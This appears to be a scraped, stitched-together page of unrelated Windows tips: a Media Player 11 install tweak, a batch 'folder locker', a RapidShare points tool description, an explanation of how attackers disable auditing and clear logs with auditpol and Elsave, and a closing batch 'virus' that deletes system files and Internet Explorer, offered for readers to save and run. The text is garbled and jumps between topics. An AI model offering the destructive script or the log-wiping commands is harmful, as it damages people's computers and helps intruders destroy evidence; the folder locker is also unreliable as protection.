Then after some months M$ came up, with the roll back patch of 20-30 MB, for MCE.But I managed to install MP11 in my MCE PC, without any such patch.Here is a very simple tweak.
Make sure you're using a genuine MCE, if it is not a genuine one, then make it
Extract the setup cabinet of MP11, with winrar or winzip.
You'll find some files there, out of these run these files. umdf.exe wmdbexport.exe wmfdist11.exe wmp11.exe
open notepad... dan copy paste below....and save any name but extention.bat compulsarY when u saved but type ur password which u wanna keep..in dat blue space in notpad
cls @ECHO OFF title Folder Locker if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==pass goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End
Main Window: -speed [pts/hour]. -How many points you collected this session [and time]. -How many did you download last 5 days [for the 25gig limit]. Settings: -Select your RS account Type [Collector or Premium] - -Choose if you want to launch it on startup. -If you want to launch it minimized. -If you want to display a TrayTooltip [Right bottom corner] which appear when you get points [how many] with which account, and total collected. -You need to fill your account infos to acess to this program. History: Here you can acess to your collected Points per day history. It obviously needs to be active on that day to know how many points did you collected TESTED
Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.
Here are some of the techniques that an attacker can use to cover his tracks:- (1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access. Just point it at the victim’s system as follows: C:\>auditpol \\192.168.10 /disable Auditing Disabled
(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared. It is used as follows:
Elsave -s \\192.168.13.10 -1 “Security” -C
(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse @if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard copy C:\windows\ @if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe @if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE JOHN hacked your IP.exe"
Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"